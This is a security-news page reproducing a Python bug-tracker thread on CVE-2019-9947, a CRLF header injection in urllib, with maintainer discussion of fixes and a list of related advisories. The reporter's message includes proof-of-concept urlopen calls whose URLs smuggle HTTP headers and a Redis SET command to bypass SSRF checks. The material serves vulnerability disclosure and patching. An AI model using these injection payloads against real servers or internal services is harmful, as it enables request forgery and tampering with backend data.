Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2019-9947: Issue 35906: [CVE-2019-9947] Header Injection in urllib

An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the path component of a URL that lacks a ? character) followed by an HTTP header or a Redis command. This is similar to the CVE-2019-9740 query string issue. This is fixed in: v2.7.17, v2.7.17rc1, v2.7.18, v2.7.18rc1; v3.5.10, v3.5.10rc1, v3.5.8, v3.5.8rc1, v3.5.8rc2, v3.5.9; v3.6.10, v3.6.10rc1, v3.6.11, v3.6.11rc1, v3.6.12, v3.6.9, v3.6.9rc1; v3.7.4, v3.7.4rc1, v3.7.4rc2, v3.7.5, v3.7.5rc1, v3.7.6, v3.7.6rc1, v3.7.7, v3.7.7rc1, v3.7.8, v3.7.8rc1, v3.7.9.

CVE
#vulnerability#redis#git#ssrf#auth

Created on 2019-02-06 00:32 by push0ebp, last changed 2022-04-11 14:59 by admin. This issue is now closed.

Pull Requests

URL

Status

Linked

Edit

PR 11768

closed

matrixise, 2019-02-06 08:30

PR 12524

closed

push0ebp, 2019-03-24 14:24

Messages (7)

msg334896 - (view)

Author: Sihoon Lee (push0ebp) *

Date: 2019-02-06 00:32

this patch can also be broken by path and query string. http://www.cvedetails.com/cve/CVE-2016-5699/ https://bugs.python.org/issue30458

can succeed to inject HTTP header and be more critical by bypassing illegal header check

Vulnerability PoC

import urllib.request

urllib.request.urlopen(‘http://127.0.0.1:1234/?q=HTTP/1.1\r\nHeader: Value\r\nHeader2: \r\n’) or urllib.request.urlopen(‘http://127.0.0.1:1234/HTTP/1.1\r\nHeader: Value\r\nHeader2: \r\n’)

nc -lv 1234 GET /?q=HTTP/1.1 Header: Value Header2: HTTP/1.1 Accept-Encoding: identity Host: 127.0.0.1:1234 User-Agent: Python-urllib/3.8 Connection: close

we can inject headers completely.

Redis

redis also be affected by bypassing SSRF protection checking header “host:” with this injection.

urllib2.urlopen(‘http://127.0.0.1:6379/?q=HTTP/1.1\r\nSET VULN POC\r\nHeader2:\r\n’).read() ‘$-1\r\n+OK\r\n-ERR unknown command `Header2:`, with args beginning with: `HTTP/1.1`, \r\n-ERR unknown command `Accept-Encoding:`, with args beginning with: `identity`, \r\n’

$ redis-cli 127.0.0.1:6379> GET VULN “POC”

Root Cause

https://github.com/python/cpython/commit/cc54c1c0d2d05fe7404ba64c53df4b1352ed2262

  • _hostprog = re.compile(‘^//([^/?]*)(.*)$’)
  • _hostprog = re.compile('//([^/#?]*)(.*)', re.DOTALL)

It could succeed to parse host because of re.DOTALL re.DOTALL gave the opportunity of injection.

this version of the commit was 3.4.7+

this vulnerability can be affected 3.4.7+ ~ 3.8-dev <- I tested it. also, python 2.7.15 can be affected. I don’t know which python2 version is affected because not test.

maybe after the commit, all of higher versions can trigger this vulnerability.

Conclusion

this patch provides more critical vulnerability to bypass the illegal header check. and we can inject HTTP header completely in urlopen() from this patch.

(Although this vulnerability is old on 12 Jul 2017, I don’t know why no one has submitted issue still now XDD)

msg334906 - (view)

Author: Stéphane Wirtel (matrixise) *

Date: 2019-02-06 08:32

Hi all,

Not sure for the right way for this fix but here is a PR. I am interested by your feedback.

Thank you

msg334999 - (view)

Author: Sihoon Lee (push0ebp) *

Date: 2019-02-07 03:05

Sorry, I’m late. My review is here. https://github.com/python/cpython/pull/11768

msg335000 - (view)

Author: Martin Panter (martin.panter) *

Date: 2019-02-07 03:34

Maybe related to Victor’s “Issue 1” described in Issue 32085. That is also a security bug about CRLF in the URL’s path, but was opened before Issue 30500 was opened and the code changed, so I’m not sure if it is the same as this or not.

Also there is Issue 13359, a proposal to automatically percent-encode invalid URLs. For a security fix, I’m not sure but it might be safer to raise an exception, rather than rewriting the invalid URL to a valid one.

msg335005 - (view)

Author: Sihoon Lee (push0ebp) *

Date: 2019-02-07 06:20

Yes, I thought so. before the commit version i said, the previous version(~3.4.6), raised an exception(no host given~) in urlopen failing parsing host. If this patch wants to be same as the previous version, It is right to raise an exception like the previous version. I thought there is no exact answer, only depends on Python features.

msg339835 - (view)

Author: STINNER Victor (vstinner) *

Date: 2019-04-10 08:51

According to https://bugzilla.redhat.com/show_bug.cgi?id=1695572, the CVE-2019-9947 has been assigned to this issue.

msg339842 - (view)

Author: Gregory P. Smith (gregory.p.smith) *

Date: 2019-04-10 09:32

my fix proposed in issue30458 fixes this issue.

i do not think this one deserved its own CVE; at least https://nvd.nist.gov/vuln/detail/CVE-2019-9947’s current text also points to the other one.

History

Date

User

Action

Args

2022-04-11 14:59:10

admin

set

github: 80087

2019-04-10 09:32:49

gregory.p.smith

set

keywords: patch, patch, patch
status: open -> closed
stage: patch review -> resolved

2019-04-10 09:32:36

gregory.p.smith

set

nosy: + gregory.p.smith
messages: + msg339842

superseder: [security][CVE-2019-9740][CVE-2019-9947] HTTP Header Injection (follow-up of CVE-2016-5699)
keywords: patch, patch, patch
resolution: duplicate

2019-04-10 08:51:12

vstinner

set

title: Header Injection in urllib -> [CVE-2019-9947] Header Injection in urllib
nosy: + vstinner

messages: + msg339835

keywords: patch, patch, patch

2019-04-09 15:44:44

ware

set

nosy: + ware

2019-03-24 14:31:57

xtreak

set

keywords: patch, patch, patch
nosy: + orsenthil

2019-03-24 14:30:26

push0ebp

set

pull_requests: - pull_request12476

2019-03-24 14:25:01

push0ebp

set

pull_requests: + pull_request12476

2019-03-24 14:24:40

push0ebp

set

pull_requests: + pull_request12475

2019-03-24 14:18:17

push0ebp

set

pull_requests: - pull_request12474

2019-03-24 14:15:43

push0ebp

set

pull_requests: + pull_request12474

2019-02-07 06:20:03

push0ebp

set

messages: + msg335005

2019-02-07 03:34:00

martin.panter

set

keywords: patch, patch, patch

messages: + msg335000

2019-02-07 03:05:31

push0ebp

set

messages: + msg334999

2019-02-06 08:56:06

matrixise

set

pull_requests: - pull_request11730

2019-02-06 08:55:55

matrixise

set

pull_requests: - pull_request11731

2019-02-06 08:32:11

matrixise

set

keywords: patch, patch, patch
nosy: + matrixise
messages: + msg334906

2019-02-06 08:30:42

matrixise

set

keywords: + patch
stage: patch review
pull_requests: + pull_request11731

2019-02-06 08:30:36

matrixise

set

keywords: + patch
stage: (no value)
pull_requests: + pull_request11730

2019-02-06 08:30:28

matrixise

set

keywords: + patch
stage: (no value)
pull_requests: + pull_request11729

2019-02-06 02:23:47

xtreak

set

nosy: + martin.panter

2019-02-06 00:33:33

rhettinger

set

nosy: + christian.heimes

2019-02-06 00:32:11

push0ebp

create

Related news

Ubuntu Security Notice USN-6891-1

Ubuntu Security Notice 6891-1 - It was discovered that Python incorrectly handled certain inputs. An attacker could possibly use this issue to execute arbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 18.04 LTS. It was discovered that Python incorrectly used regular expressions vulnerable to catastrophic backtracking. A remote attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 14.04 LTS.

CVE-2023-43074: DSA-2023-141: Dell Unity, Unity VSA and Unity XT Security Update for Multiple Vulnerability

Dell Unity 5.3 contain(s) an Arbitrary File Creation vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability by crafting arbitrary files through a request to the server.

CVE-2022-34456: DSA-2022-267: Dell EMC Metronode VS5 Security Update for Multiple Third-Party Component Vulnerabilities

Dell EMC Metro node, Version(s) prior to 7.1, contain a Code Injection Vulnerability. An authenticated nonprivileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application.

CVE-2022-21586: Oracle Critical Patch Update Advisory - July 2022

Vulnerability in the Oracle Banking Trade Finance product of Oracle Financial Services Applications (component: Infrastructure). The supported version that is affected is 14.5. Difficult to exploit vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Banking Trade Finance. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Banking Trade Finance accessible data as well as unauthorized access to critical data or complete access to all Oracle Banking Trade Finance accessible data. CVSS 3.1 Base Score 6.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N).

CVE-2019-4241: Security Bulletin: Multiple vulnerabilities affect IBM PureApplication System

IBM PureApplication System 2.2.3.0 through 2.2.5.3 could allow an authenticated user with local access to bypass authentication and obtain administrative access. IBM X-Force ID: 159467.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907